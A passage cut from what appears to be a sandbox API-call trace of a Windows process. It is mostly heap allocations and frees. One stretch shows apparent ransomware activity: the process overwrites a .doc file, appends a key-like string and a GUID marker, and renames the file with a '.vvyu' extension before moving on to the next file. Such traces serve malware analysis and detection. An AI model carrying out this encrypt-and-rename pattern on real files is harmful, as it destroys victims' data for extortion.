(HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0197.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0197.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6770 [0197.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0197.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6800 [0197.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0197.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67d0 [0197.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae67b8 [0197.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6818 [0197.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67b8 | out: hHeap=0x2c0000) returned 1 [0197.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67b8 [0197.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67d0 | out: hHeap=0x2c0000) returned 1 [0197.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0197.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0197.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0197.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6788 | out: hHeap=0x2c0000) returned 1 [0197.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6788 [0197.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0197.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67e8 | out: hHeap=0x2c0000) returned 1 [0197.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0197.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6818 | out: hHeap=0x2c0000) returned 1 [0197.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0197.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0197.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0197.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6788 | out: hHeap=0x2c0000) returned 1 [0197.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0197.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0197.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0197.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0197.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0197.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0197.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0197.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0197.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0197.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67b8 | out: hHeap=0x2c0000) returned 1 [0197.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6800 | out: hHeap=0x2c0000) returned 1 [0197.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0197.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67a0 | out: hHeap=0x2c0000) returned 1 [0197.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6770 | out: hHeap=0x2c0000) returned 1 [0197.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0197.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0197.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0197.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6758 | out: hHeap=0x2c0000) returned 1 [0197.348] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea770 | out: hHeap=0x2c0000) returned 1 [0197.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0197.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0197.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0197.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0197.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.350] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0197.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0197.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.352] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xa40d, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xa40d, lpOverlapped=0x0) returned 1 [0197.353] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0197.353] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa412, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.353] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0197.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0197.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0197.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0197.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0197.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0197.355] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0197.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0197.355] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.355] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0197.355] CloseHandle (hObject=0x584) returned 1 [0197.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0197.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0197.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0197.358] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\ySw9UDFA\\sJ8rZqt9cv0j.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\ysw9udfa\\sj8rzqt9cv0j.doc"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\ySw9UDFA\\sJ8rZqt9cv0j.doc.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\ysw9udfa\\sj8rzqt9cv0j.doc.vvyu")) returned 1 [0197.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.359] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0197.363] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b94cb30, ftCreationTime.dwHighDateTime=0x1d8a495, ftLastAccessTime.dwLowDateTime=0x85b20620, ftLastAccessTime.dwHighDateTime=0x1d8a590, ftLastWriteTime.dwLowDateTime=0x85b20620, ftLastWriteTime.dwHighDateTime=0x1d8a590, nFileSizeHigh=0x0, nFileSizeLow=0xa412, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sJ8rZqt9cv0j.doc", cAlternateFileName="SJ8RZQ~1.DOC")) returned 0 [0197.363] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0197.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0197.364] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0197.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0197.364] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0197.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0197.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0197.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.394] HeapFree (in: 